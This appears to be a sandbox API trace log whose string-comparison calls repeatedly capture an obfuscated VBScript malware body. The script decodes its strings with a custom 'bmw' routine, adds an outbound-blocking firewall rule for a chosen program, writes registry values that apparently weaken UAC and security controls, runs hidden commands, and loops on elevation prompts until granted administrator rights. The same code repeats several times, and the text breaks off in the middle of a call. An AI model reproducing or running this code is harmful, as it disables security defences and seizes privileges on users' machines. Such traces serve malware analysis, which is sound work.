CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0222.964] wcsncmp (_String1=")*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.964] wcsncmp (_String1="*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.964] wcsncmp (_String1="25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.965] wcsncmp (_String1="5 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 